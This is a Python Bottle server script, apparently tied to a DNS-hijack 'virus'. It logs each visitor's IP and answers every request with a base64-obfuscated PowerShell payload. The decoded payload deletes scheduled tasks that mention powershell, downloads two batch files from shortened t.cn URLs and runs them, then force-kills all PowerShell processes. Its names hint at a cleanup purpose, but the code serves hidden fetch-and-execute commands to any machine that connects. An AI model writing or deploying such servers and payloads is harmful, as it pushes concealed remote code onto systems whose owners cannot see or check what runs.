# -*- coding:utf-8 -*-

from bottle import *
import logging
import json

class Logger():

    def __init__(self, logname, loglevel, logger):
        '''
            指定保存日志的文件路径，日志级别，以及调用文件
            将日志存入到指定的文件中
        '''

        # 创建一个logger
        self.logger = logging.getLogger(logger)
        self.logger.setLevel(logging.DEBUG)

        # 创建一个handler，用于写入日志文件
        fh = logging.FileHandler(logname)
        fh.setLevel(logging.DEBUG)

        # 再创建一个handler，用于输出到控制台
        ch = logging.StreamHandler()
        ch.setLevel(logging.DEBUG)

        # 定义handler的输出格式
        formatter = logging.Formatter(
            '%(asctime)s %(filename)s [line:%(lineno)d] %(levelname)s %(message)s')
        # formatter = self.format_dict[int(loglevel)]
        fh.setFormatter(formatter)
        ch.setFormatter(formatter)

        # 给logger添加handler
        self.logger.addHandler(fh)

        self.logger.addHandler(ch)

    def getlog(self):
        return self.logger

logger=Logger(logname='./dns_virus.log', loglevel=1, logger="dnsvirus").getlog()

ps="""
Invoke-Expression ([System.Text.UnicodeEncoding]::Unicode.GetString([Convert]::FromBase64String("UgBlAHMAdABhAHIAdAAtAFMAZQByAHYAaQBjAGUAIABzAGMAaABlAGQAdQBsAGUADQAKACQAcwBlAHIAdgBpAGMAZQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACgAIgBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACIAKQANAAoAJABzAGUAcgB2AGkAYwBlAC4AQwBvAG4AbgBlAGMAdAAoACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQApAA0ACgBGAHUAbgBjAHQAaQBvAG4AIABEAGUAbABlAHQAZQBQAG8AdwBlAHIAcwBoAGUAbABsAFQAYQBzAGsAUwBjAGgAZQBkAHUAbABlAHIAKAAkAFQAYQBzAGsAUABhAHQAaAApAHsADQAKACAAIAAgACAAJABmAG8AbABkAGUAcgA9ACQAcwBlAHIAdgBpAGMAZQAuAEcAZQB0AEYAbwBsAGQAZQByACgAJABUAGEAcwBrAFAAYQB0AGgAKQANAAoAIAAgACAAIAAkAHQAYQBzAGsAaQB0AGUAbQA9ACQAZgBvAGwAZABlAHIALgBHAGUAdABGAG8AbABkAGUAcgBzACgAMAApAA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHQAYQBzAGsAaQB0AGUAbQApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHQAYQBzAGsAcwA9ACQAaQAuAEcAZQB0AFQAYQBzAGsAcwAoADAAKQANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByAGUAYQBjAGgAKAAkAHQAYQBzAGsAIABpAG4AIAAkAHQAYQBzAGsAcwApAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAdABhAHMAawBOAGEAbQBlAD0AJAB0AGEAcwBrAC4ATgBhAG0AZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB0AGEAcwBrAFAAYQB0AGgAPQAkAHQAYQBzAGsALgBQAGEAdABoAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHQAYQBzAGsAWABtAGwAPQAkAHQAYQBzAGsALgBYAG0AbAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBXAHIAaQB0AGUALQBIAG8AcwB0ACAAJAB0AGEAcwBrAE4AYQBtAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAoAFsAUwB0AHIAaQBuAGcAXQA6ADoASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoACQAdABhAHMAawBYAG0AbAApACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkALgBEAGUAbABlAHQAZQBUAGEAcwBrACgAJAB0AGEAcwBrAE4AYQBtAGUALAAwACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAJAB0AGEAcwBrAE4AYQBtAGUAIABzAGgAYwBkAHUAbABlACAAdAByAGUAZQAgAGUAcgByAG8AcgAgACwAIABkAGUAbABlAHQAZQAgAHMAdQBjAGUAcwBzACIADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABlAGwAcwBlAGkAZgAgACgAJAB0AGEAcwBrAFgAbQBsAC4AVABvAEwAbwB3AGUAcgAoACkALgBDAG8AbgB0AGEAaQBuAHMAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgApACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBmAGkAbgBkACAAcwBjAGgAZQBkAHUAbABlAHIAIABzAGMAcgBpAHAAdAA6ACQAdABhAHMAawBQAGEAdABoACIADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB0AGEAcwBrAC4ARQBuAGEAYgBsAGUAZAA9ADAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABpAC4ARABlAGwAZQB0AGUAVABhAHMAawAoACQAdABhAHMAawBOAGEAbQBlACwAMAApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAEQAZQBsAGUAdABlAFAAbwB3AGUAcgBzAGgAZQBsAGwAVABhAHMAawBTAGMAaABlAGQAdQBsAGUAcgAoACQAaQAuAFAAYQB0AGgAKQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAH0ADQAKAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAGMAbABlAGEAcgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIABzAGMAcgBpAHAAdAAiAA0ACgBEAGUAbABlAHQAZQBQAG8AdwBlAHIAcwBoAGUAbABsAFQAYQBzAGsAUwBjAGgAZQBkAHUAbABlAHIAIAAtAFQAYQBzAGsAUABhAHQAaAAgACIAXAAiAA0ACgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBjAGwAZQBhAHIAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAcwBjAHIAaQBwAHQAIABkAG8AbgBlAC4AIgANAAoAJABkACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXAByAGUAbQBvAHYAZQBfAHIAYQBuAGQAbwBtAF8ANAAzADcALgBiAGEAdAAiAA0ACgAkAGMAMQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQADQAKACQAYwAxAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdAAuAGMAbgAvAEUAWABhAEUAdgBrAFAAIgAsACQAZAApAA0ACgAkAGQAZQBzACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXAByAGUAbQBvAHYAZQBfAHIAYQBuAGQAbwBtAC4AYgBhAHQAIgANAAoAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAANAAoAJABjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdAAuAGMAbgAvAEUAWABhAFIAUwBTAHoAIgAsACQAZABlAHMAKQANAAoAaQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAJABkAGUAcwANAAoAaQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAJABkAA0ACgBSAGUAcwB0AGEAcgB0AC0AUwBlAHIAdgBpAGMAZQAgAHMAYwBoAGUAZAB1AGwAZQANAAoARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAIABTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0ARgBvAHIAYwBlAA==")));
"""

@route('/<n:path>',method=["POST","GET"])
def powershell(n):
    logger.info(json.dumps({"IP":request.remote_addr,"Path":request.url}))
    return ps

@route('/')
def index():
    logger.info(json.dumps({"IP": request.remote_addr, "Path": request.url}))
    return ps

if __name__ == '__main__':
    try:
        run(host='0.0.0.0',port=80)
    except Exception,e:
        print e